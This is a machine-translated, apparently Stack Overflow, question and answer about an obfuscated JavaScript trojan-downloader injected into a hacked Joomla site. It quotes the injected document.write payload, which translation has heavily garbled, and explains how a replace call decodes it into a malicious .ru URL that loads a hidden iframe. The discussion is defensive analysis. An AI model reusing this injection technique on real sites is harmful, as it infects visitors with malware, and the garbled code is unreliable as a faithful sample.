这个感染脚本的网站是如何工作的?

我的乔姆拉!该网站已被多次黑客入侵。不知何故,有人设法将以下垃圾注入到关键的php脚本中,但我的意思是不要谈论配置Joomla。该网站的访问量不多(有时我担心我可能是该网站的唯一访问者…),我不太关心该网站的备份和运行。我最终会处理的

我的问题是,这些垃圾是如何工作的?我看着它,我只是不明白这是怎么造成伤害的?它所做的是尝试下载一个名为ChangeLog.PDF的PDF文件,该文件感染了特洛伊木马,打开后将冻结您的Acrobat并对您的计算机造成严重破坏。它是怎么做到的,我不知道,我不在乎。但是下面的脚本如何调用下载

<脚本&gt/*异常*/document.write('<script src='https://stackoverflow.com/questions/2117747/1〕https://stackoverflow.com/questions/2117747/+"h#^(t$&p#:)&p#/#/#/#/#/#/#/#/#/#/#/#/#/#/#/#d ^!!&n#s$#/#/#)o ^(r!#g!!#/#/#/#!a#m#@e&amp$s^@![email protected]($![email protected]$p(.&@c&)@(o$m))$百万元)@([email protected](3)本局现正及及;两两个及及;及及及;两两个及及;两个及及及;两两(3)c!!及及及四(3)及及及及及及两两(3)及及及及及及两两两(3)及及两两(3)及两(3)及及两(3)及两两(3)及及及两(3)及及及及两(3)两两两(3)及及及及两(3)及及及及两)两(3)两(3)及及及及及及两(3)两(3)两(3)及及及及及两)两(3)两(3)及及及四)两(3)两(3)及及及及四)两(3)两(3)及及及及及四)两(3)两(3)两(3)及及及及及及四)两(3)两(3)元元元元元)及及及及(二)s#o#o#f#t$t#o#n(i#c$t#n)s#o#o#f#;[email protected]!&^m&/&$(o!f&!t&o!!n)&^i$&c![email protected]@((m෣35555;35555;;;ţ;3555;;;3555;;;((((෣3555;3555;ţ;;;(((?#;;;)m\35;;本本本本本本本本村村村村村村村村村村))的((((((((((((355෣)))本本本本本本本本本本本本本本本本本本本本本本本本本本本本本村村))))))))^^^^^^^^^^^^^^^^^^^^^^^^^^^^!m((((((((((((((()替换(//#|||||||||||||||||||||||||||||||||;
<!--6F471C20C9B96 FED179C85FFDD3365CF-->

ESET已检测到此代码为JS/TrojanDownloader.Agent.NRO特洛伊木马

请注意在巨大的凌乱字符串之后的replace调用:.replace(/#|$$|@| ^ |&&| \(| \)|!/ig',)

它会删除大部分特殊字符,将其转换为普通URL:

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(我手动将http:更改为evil:

注意,正则表达式可以简化为.replace(/[#$^&()!]/ig',)

如果您查看该脚本,您将看到它是一个非常简单的脚本,它注入了一个隐藏的IFRAME,其中包含来自同一域的路径/index.php?ys

我用Fiddler要求那一页,但它没有内容

发表评论